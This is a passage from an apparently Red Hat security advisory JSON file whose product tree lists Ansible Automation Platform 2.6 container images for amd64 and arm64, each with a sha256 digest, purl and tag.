"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.6",
"product": {
"name": "Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform:2.6::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat Ansible Automation Platform"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/platform-operator-bundle@sha256%3Af27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform\u0026tag=1774648925"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mcp-server-rhel9@sha256%3A2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-tech-preview\u0026tag=1774268173"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/aap-must-gather-rhel9@sha256%3A224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774139204"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"product_identification_helper": {
"purl": "pkg:oci/platform-operator-bundle@sha256%3A79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform\u0026tag=1774648896"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-builder-rhel9@sha256%3Adb8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774153089"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-dev-tools-rhel9@sha256%3A417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774585183"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-chatbot-rhel9@sha256%3Ad17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774417022"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9@sha256%3Ab348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774363040"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9-operator@sha256%3A2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484113"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mcp-tools-rhel9@sha256%3A59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774268174"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9@sha256%3A5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774368903"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9-operator@sha256%3Aee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484033"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9@sha256%3A7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774258433"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9-operator@sha256%3A2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484073"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-ui-rhel9@sha256%3A4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484106"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9@sha256%3A01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774243862"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9-operator@sha256%3A7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484129"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-proxy-rhel9@sha256%3A021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774139334"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9@sha256%3Aa0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774644659"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9-operator@sha256%3A1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484154"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hub-web-rhel9@sha256%3Ad7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774647780"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"product_identification_helper": {
"purl": "pkg:oci/metrics-service-rhel9@sha256%3A5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-tech-preview\u0026tag=1774540248"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"product_identification_helper": {
"purl": "pkg:oci/de-minimal-rhel9@sha256%3A5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774487884"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"product_identification_helper": {
"purl": "pkg:oci/de-supported-rhel9@sha256%3A2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774490244"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-rhel9-operator@sha256%3A1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484549"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-runner-rhel9@sha256%3Af0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774485790"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"product_identification_helper": {
"purl": "pkg:oci/receptor-rhel9@sha256%3Acb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774573035"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"product_identification_helper": {
"purl": "pkg:oci/mcp-server-rhel9@sha256%3A6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-tech-preview\u0026tag=1774268173"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/aap-must-gather-rhel9@sha256%3Ad26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774139204"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-builder-rhel9@sha256%3A97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774153089"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-dev-tools-rhel9@sha256%3A043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774585183"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-chatbot-rhel9@sha256%3A20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774417022"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9@sha256%3A839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774363040"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9-operator@sha256%3Accf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484113"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"product_identification_helper": {
